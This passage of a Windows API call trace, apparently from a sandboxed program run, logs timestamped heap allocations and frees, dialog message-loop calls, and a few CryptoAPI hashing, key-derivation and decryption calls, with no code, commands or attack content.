hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad30 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae98 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae50 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78948 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78918 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae68 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae38 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae20 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe788e8 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ae08 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7adf0 | out: hHeap=0xc60000) returned 1 [0255.574] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe788b8 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7add8 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7adc0 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78888 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ada8 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad90 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78858 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad78 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad60 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78828 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81d18 | out: hHeap=0xc60000) returned 1 [0255.575] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.575] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 1 [0255.575] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f5e4) returned 0 [0255.575] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87f5e4) returned 1 [0255.576] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 1 [0255.576] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f5e4) returned 0 [0255.576] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87f5e4) returned 1 [0255.576] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.576] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b30 [0255.576] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xefe5f0 [0255.576] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b20 [0255.576] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefe5f0 | out: hHeap=0xc60000) returned 1 [0255.577] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b20 | out: hHeap=0xc60000) returned 1 [0255.577] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b20 [0255.577] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4ac0 [0255.578] CryptCreateHash (in: hProv=0xcc2d90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87ecd8 | out: phHash=0x87ecd8) returned 1 [0255.579] CryptHashData (hHash=0xed5938, pbData=0xe7aca0, dwDataLen=0xd, dwFlags=0x1) returned 1 [0255.579] CryptDeriveKey (in: hProv=0xcc2d90, Algid=0x660e, hBaseData=0xed5938, dwFlags=0x1, phKey=0x87ecd8 | out: phKey=0x87ecd8*=0xed5978) returned 1 [0255.580] CryptDestroyHash (hHash=0xed5938) returned 1 [0255.583] CryptGetKeyParam (in: hKey=0xed5978, dwParam=0x7, pbData=0xed4a70, pdwDataLen=0x87e7c0, dwFlags=0x0 | out: pbData=0xed4a70*=0x660e, pdwDataLen=0x87e7c0*=0x4) returned 1 [0255.584] CryptDecrypt (in: hKey=0xed5978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xefe3d0, pdwDataLen=0x87ecf0 | out: pbData=0xefe3d0, pdwDataLen=0x87ecf0) returned 0 [0255.585] CryptDestroyKey (hKey=0xed5978) returned 1 [0255.585] CryptReleaseContext (hProv=0xcc2d90, dwFlags=0x0) returned 1 [0255.586] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4a80 [0255.586] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xefe3d0 [0255.586] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78828 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a138 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0a8 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78738 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ad0 [0255.619] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78738 | out: hHeap=0xc60000) returned 1 [0255.619] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ad0 | out: hHeap=0xc60000) returned 1 [0255.619] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0a8 | out: hHeap=0xc60000) returned 1 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0a8 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78738 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78798 [0255.619] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ad0 [0255.619] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78798 | out: hHeap=0xc60000) returned 1 [0255.619] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ad0 | out: hHeap=0xc60000) returned 1 [0255.619] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78738 | out: hHeap=0xc60000) returned 1 [0255.620] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78738 [0255.620] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78798 [0255.620] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789a8 [0255.620] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ad0 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789a8 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ad0 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78798 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed49e0 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed49a0 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeece58 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78678 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78978 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78708 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad60 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78a38 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ac58 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78888 | out: hHeap=0xc60000) returned 1 [0255.620] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad18 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad78 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ac88 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb38 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a138 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0a8 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78738 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78828 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefe3d0 | out: hHeap=0xc60000) returned 1 [0255.621] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a80 | out: hHeap=0xc60000) returned 1 [0255.621] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 1 [0255.621] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.621] NtdllDialogWndProc_W () returned 0x0 [0255.622] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.622] NtdllDialogWndProc_W () returned 0x0 [0255.622] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.622] NtdllDialogWndProc_W () returned 0x0 [0255.622] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f5e4) returned 0 [0255.622] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87f5e4) returned 1 [0255.622] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.622] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb38 [0255.622] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78828 [0255.623] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4a80 [0255.623] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b30 [0255.623] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xefc3e8 [0255.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefc3e8 | out: hHeap=0xc60000) returned 1 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.623] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78738 [0255.623] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81d18 [0255.623] PeekMessageW (in: lpMsg=0x87f1b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1b4) returned 0 [0255.623] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b30 [0255.623] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed49a0 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed49a0 | out: hHeap=0xc60000) returned 1 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81d18 | out: hHeap=0xc60000) returned 1 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78738 | out: hHeap=0xc60000) returned 1 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a80 | out: hHeap=0xc60000) returned 1 [0255.623] FreeLibrary (hLibModule=0x74f20000) returned 1 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78828 | out: hHeap=0xc60000) returned 1 [0255.623] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb38 | out: hHeap=0xc60000) returned 1 [0255.624] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.624] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed5978 | out: hHeap=0xc60000) returned 1 [0255.624] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0255.624] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81cd0 | out: hHeap=0xc60000) returned 1 [0255.624] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad90 | out: hHeap=0xc60000) returned 1 [0255.624] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0255.624] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4a80 [0255.624] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b30 [0255.624] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed49a0 [0255.624] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.624] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed49a0 | out: hHeap=0xc60000) returned 1 [0255.624] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b30 | out: hHeap=0xc60000) returned 1 [0255.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a80 | out: hHeap=0xc60000) returned 1 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb38 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7ad90 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78828 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78738 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ac88 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b258 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7ad78 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeece58 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.625] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4a80 [0255.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a80 | out: hHeap=0xc60000) returned 1 [0255.625] CloseHandle (hObject=0x61c) returned 1 [0255.625] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aec8 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b80 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xf0aea0 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed5878 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7acd0 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a90 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecbd8 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeece58 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad90 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78828 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ac88 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78738 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0255.626] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad78 | out: hHeap=0xc60000) returned 1 [0255.627] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb38 | out: hHeap=0xc60000) returned 1 [0255.627] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0255.627] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4a90 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b80 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4a80 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.628] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a80 | out: hHeap=0xc60000) returned 1 [0255.628] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.628] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b80 | out: hHeap=0xc60000) returned 1 [0255.628] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a90 | out: hHeap=0xc60000) returned 1 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb38 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7ad78 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b258 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78738 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ac88 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78828 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7ad90 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeece58 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad48 [0255.628] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4a90 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4a90 | out: hHeap=0xc60000) returned 1 [0255.629] CloseHandle (hObject=0x5e8) returned 1 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ada8 | out: hHeap=0xc60000) returned 1 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b00 | out: hHeap=0xc60000) returned 1 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xf1aea8 | out: hHeap=0xc60000) returned 1 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed5938 | out: hHeap=0xc60000) returned 1 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe787c8 | out: hHeap=0xc60000) returned 1 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.629] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecd68 | out: hHeap=0xc60000) returned 1 [0255.630] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad48 | out: hHeap=0xc60000) returned 1 [0255.630] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeece58 | out: hHeap=0xc60000) returned 1 [0255.630] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad78 | out: hHeap=0xc60000) returned 1 [0255.630] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0255.631] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ac88 | out: hHeap=0xc60000) returned 1 [0255.631] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78738 | out: hHeap=0xc60000) returned 1 [0255.631] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78828 | out: hHeap=0xc60000) returned 1 [0255.632] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad90 | out: hHeap=0xc60000) returned 1 [0255.632] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb38 | out: hHeap=0xc60000) returned 1 [0255.632] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 1 [0255.632] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f83c) returned 0 [0255.632] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87f83c) returned 1 [0255.632] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 1 [0255.632] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f83c) returned 0 [0255.632] TranslateMessage (lpMsg=0x87f83c) returned 0 [0255.632] DispatchMessageW (lpMsg=0x87f83c) returned 0x0 [0255.632] GetForegroundWindow () returned 0x50150 [0255.632] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.632] GetCursorPos (in: lpPoint=0x87f678 | out: lpPoint=0x87f678*(x=883, y=499)) returned 1 [0255.632] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f678 | out: lpPoint=0x87f678) returned 1 [0255.633] GetAsyncKeyState (vKey=1) returned 0 [0255.633] GetAsyncKeyState (vKey=2) returned 0 [0255.633] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 1 [0255.633] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87f83c) returned 0 [0255.633] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87f83c) returned 1 [0255.633] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0255.633] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b70 [0255.633] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecb38 [0255.633] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7ad90 [0255.633] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b00 [0255.633] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b00 | out: hHeap=0xc60000) returned 1 [0255.633] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78828 [0255.633] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b00 [0255.633] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b00 | out: hHeap=0xc60000) returned 1 [0255.634] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78738 [0255.634] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4b00 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b00 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7ad90 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78828 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78738 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecb38 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b70 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81c88 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b030 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec958 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c00 | out: hHeap=0xc60000) returned 1 